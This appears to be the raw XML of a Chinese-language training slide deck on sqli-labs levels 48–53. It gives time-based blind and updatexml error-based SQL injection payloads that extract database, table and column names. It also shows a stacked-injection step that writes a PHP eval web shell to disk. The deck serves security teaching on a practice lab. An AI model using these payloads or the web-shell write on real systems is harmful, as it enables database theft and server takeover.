            <a:xfrm>
              <a:off x="2545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1" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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2" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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3" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776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4" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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5" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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6" name="Rectangle 130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7" name="Rectangle 131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8" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065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9" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207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0" name="Rectangle 134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1" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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2" name="Rectangle 136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3" name="Rectangle 137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4" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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5" name="Rectangle 139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6" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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7" name="Rectangle 141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8" name="Rectangle 142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9" name="Rectangle 143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0" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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1" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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2" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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3" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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4" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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5" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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6" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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7" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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1029" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="381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0" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152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1" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800"/>
            <a:ext cx="40644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711270" y="1295400"/>
            <a:ext cx="109230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550" y="6505575"/>
            <a:ext cx="111771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CFB4DC4-41B9-4E61-AD6F-4DDEA2B45915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00864" y="262255"/>
            <a:ext cx="868553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" y="8253"/>
            <a:ext cx="12242310" cy="6933462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4035198" y="5682600"/>
            <a:ext cx="4183920" cy="550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讲师：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="30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朝阳</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470078" y="4988520"/>
            <a:ext cx="3313440" cy="488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掌控安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-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44479" y="2564686"/>
            <a:ext cx="8239217" cy="86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altLang="zh-CN" sz="1800" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00206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 b="1" spc="-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</a:rPr>
              <a:t>sql-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="-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</a:rPr>
              <a:t>靶场原理详解（十二）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第五十三关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264920" y="1924685"/>
            <a:ext cx="9126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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and if (length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235710" y="2410460"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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228725" y="2825115"/>
            <a:ext cx="9744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 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:t>and if ((ascii(substr(database(),1,1))=115),sleep(5),1) -- qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>s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235710" y="3380740"/>
            <a:ext cx="98659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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 延时，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>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264920" y="43014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猜表名：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228725" y="5777865"/>
            <a:ext cx="104451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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i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235710" y="54362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猜字段名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235710" y="1556385"/>
            <a:ext cx="9279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猜解库名长度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200150" y="4724400"/>
            <a:ext cx="108673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and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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第四十八关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479376" y="1484784"/>
            <a:ext cx="6948772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4295" y="1658620"/>
            <a:ext cx="8747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这题看上去和上节课所讲的题目类似，我们依然可以看出他后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传参最后是去做了一个排序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>于是我们可以按照之前思路尝试使用报错的方式，发现并没有效果，这个时候可以再试试之前所讲的盲注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56455" y="2708910"/>
            <a:ext cx="2411095" cy="372300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第四十八关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4920" y="1817370"/>
            <a:ext cx="9126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dirty="0"/>
              <a:t>and if (length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235710" y="2303145"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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64920" y="2726575"/>
            <a:ext cx="9744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dirty="0"/>
              <a:t> and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1))=115),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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28725" y="3293745"/>
            <a:ext cx="98659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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1,1))=101),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e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64920" y="41941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猜表名：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200150" y="4617085"/>
            <a:ext cx="108673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 and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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228725" y="5670550"/>
            <a:ext cx="104451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and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i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1235710" y="53289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猜字段名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235710" y="1449070"/>
            <a:ext cx="9279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猜解库名长度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第四十九关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265555" y="1852930"/>
            <a:ext cx="9126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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:t>and if (length(database())=8,sleep(5),1) -- qwe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36345" y="2338705"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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29360" y="2753360"/>
            <a:ext cx="9744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 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:t>and if ((ascii(substr(database(),1,1))=115),sleep(5),1) -- qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>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36345" y="3308985"/>
            <a:ext cx="98659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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1,1))=101),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e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65555" y="42297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猜表名：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229360" y="5706110"/>
            <a:ext cx="104451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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i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36345" y="53644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猜字段名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236345" y="1484630"/>
            <a:ext cx="9279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猜解库名长度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200785" y="4652645"/>
            <a:ext cx="108673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and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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第五十关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92200" y="1628775"/>
            <a:ext cx="100310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进入题目，发现和之前题目是差不多的，我们输入依旧是会被拼接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后面，于是按照以往思路尝试一下报错注入，发现这里确实是存在报错注入的，那么这题和前面题目的区别又在哪里呢，我们看一下源码，发现了这么一个函数mysqli_multi_query，这个函数就是之前给所讲产生堆叠注入的函数，那么这里我们依旧可以尝试下堆叠注入，这里我们尝试利用堆叠写马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36140" y="2961005"/>
            <a:ext cx="711581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select '&lt;?php eval($_REQUEST[8])?&gt;' into outfile ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>D:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpStudy1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs-master\\Less-50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>'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10" y="3500755"/>
            <a:ext cx="2183765" cy="28765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第五十关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35710" y="2060575"/>
            <a:ext cx="97764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判断库名： and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断表名：and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断列名：and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断数据：and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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第五十一关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235710" y="2456815"/>
            <a:ext cx="97764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判断库名： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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01775" y="1736725"/>
            <a:ext cx="9189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做法跟上题一致，只是闭合的区别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第五十二关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796415" y="1637665"/>
            <a:ext cx="8665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看这题的样子又跟咱们之前题目一样，这里依旧是老套路，换了闭合再换注入方式，这里依旧存在堆叠注入，只不过不能用报错注入的方式去做了，需要用到盲注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00" y="2678882"/>
            <a:ext cx="2879185" cy="379258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第五十二关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4920" y="1817370"/>
            <a:ext cx="9126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dirty="0"/>
              <a:t>and if (length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235710" y="2303145"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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28725" y="2717800"/>
            <a:ext cx="9744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dirty="0"/>
              <a:t> and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1))=115),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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28725" y="3293745"/>
            <a:ext cx="98659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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1,1))=101),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e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64920" y="41941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猜表名：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200150" y="4617085"/>
            <a:ext cx="108673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and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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228725" y="5670550"/>
            <a:ext cx="104451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and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i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35710" y="53289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猜字段名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235710" y="1449070"/>
            <a:ext cx="9279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猜解库名长度</a:t>
            </a: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240,&quot;width&quot;:5985}"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="sx272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light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A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="449CD8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CFCFCF"/>
